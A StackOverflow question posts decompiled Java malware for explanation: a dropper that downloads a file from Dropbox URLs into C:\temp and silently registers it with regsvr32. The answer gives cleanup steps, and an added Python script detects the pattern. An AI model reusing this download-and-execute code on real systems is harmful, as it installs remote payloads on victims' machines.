Please someone explain me the output of this JAVA code DO NOT RUN THIS CODE IT WILL STEAL PASSWORDS [closed]

StackOverflow https://stackoverflow.com/questions/23518734

Question

This is a jar executable file I just obtained. It looks like some kind of a virus, stealing passwords, I think, but I don't know what it actually does. I decoded it with a piece of software and obtained the code. So can someone please just look at this code (DO NOT RUN IT) and just explain what is actually done in this code?

public static void Run() throws IOException
{
    int i = 3;
    while (i < 9)
    {
        Runtime.getRuntime().exec("regsvr32 /s C:\\temp\\YQJHBJX.PWY");
        i++;
    }
}

public static void main(String[] args) throws Exception
{
    new File("C:\\temp\\").mkdir();
    File localFile = new File("C:\\temp\\YQJHBJX.PWY");
    if (localFile.exists())
    {
        Run();
    }
    else
    {
        String[] arrayOfString1 = "f6pb6ya5e5vc0q5/d.dat?dl=1@@@21urb4zg9n2on4s/d.dat?dl=1".split("@@@");
        for (String str1 : arrayOfString1)
        {
            URL localURL = new URL("https://dl.dropboxusercontent.com/s/" + str1);
            HttpURLConnection localHttpURLConnection = (HttpURLConnection)localURL.openConnection();
            localHttpURLConnection.connect();
            if (localHttpURLConnection.getResponseCode() / 100 == 2)
            {
                String str2 = "https://dl.dropboxusercontent.com/s/"+ str1;
                String str3 = "C:\\temp\\YQJHBJX.PWY";
                goToWeb(str2, str3);
                break;
            }
        }
    }
}

public static void goToWeb(String paramString1, String paramString2) throws IOException
{
    System.out.println(paramString1);
    System.out.println(paramString2);

    InputStream localInputStream = URI.create(paramString1).toURL().openStream();
    Files.copy(localInputStream, Paths.get(paramString2, new String[0]), new CopyOption[0]);

    Run();
}

Solution

It's downloading a most likely malicious file from Dropbox and registering it as a DLL. The exploit is in that file: "C:\temp\YQJHBJX.PWY". Unregister it with regsvr32 /u and delete it if it exists.
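For detection, the behaviour described in the answer leaves a recognisable process-creation pattern: a Java runtime spawning `regsvr32 /s` against a file with a non-DLL extension in a user-writable directory. The following is an added example, not part of the original question or answer; the event field names, the writable-directory list and the sample events are assumptions constructed for illustration.

```python
import ntpath
import re

EXPECTED_EXT = {".dll", ".ocx"}   # what regsvr32 is normally pointed at
# Assumed list of user-writable locations; tune for your environment.
WRITABLE = ("c:\\temp\\", "c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
JAVA_PARENTS = {"java.exe", "javaw.exe"}
TOKEN = re.compile(r'"([^"]*)"|(\S+)')  # quoted or bare command-line argument

def parse_regsvr32(command_line):
    """Return (switches, target) for a regsvr32 command line, else None."""
    tokens = [q or b for q, b in TOKEN.findall(command_line) if q or b]
    if not tokens or ntpath.basename(tokens[0]).lower() not in ("regsvr32", "regsvr32.exe"):
        return None
    args = tokens[1:]
    switches = {"/" + a[1:].lower() for a in args if a[0] in "/-"}
    targets = [a for a in args if a[0] not in "/-"]
    return switches, (targets[-1] if targets else None)

def score_event(event):
    """List the reasons a process-creation event matches the dropper's pattern."""
    parsed = parse_regsvr32(event["command_line"])
    if parsed is None or parsed[1] is None:
        return []
    switches, target = parsed
    reasons = []
    if "/s" in switches:
        reasons.append("silent registration (/s)")
    if ntpath.splitext(target)[1].lower() not in EXPECTED_EXT:
        reasons.append("target is not .dll/.ocx")
    if target.lower().startswith(WRITABLE):
        reasons.append("target in user-writable directory")
    if ntpath.basename(event["parent_image"]).lower() in JAVA_PARENTS:
        reasons.append("spawned by a Java runtime")
    return reasons

def alerts(events, threshold=3):
    """Command lines whose number of matched reasons reaches the threshold."""
    return [e["command_line"] for e in events if len(score_event(e)) >= threshold]

# Constructed sample events (parent paths are made up for illustration).
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Java\jre7\bin\javaw.exe",
     "command_line": r"regsvr32 /s C:\temp\YQJHBJX.PWY"},
    {"parent_image": r"C:\Windows\System32\msiexec.exe",
     "command_line": r'"C:\Windows\System32\regsvr32.exe" /s "C:\Program Files\Vendor\codec.dll"'},
    {"parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"notepad.exe C:\temp\notes.txt"},
]
```

Only the first sample event reaches the threshold; the installer-driven registration of a real `.dll` under `Program Files` matches a single reason and is not reported.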

License: CC-BY-SA with attribution
Not affiliated with StackOverflow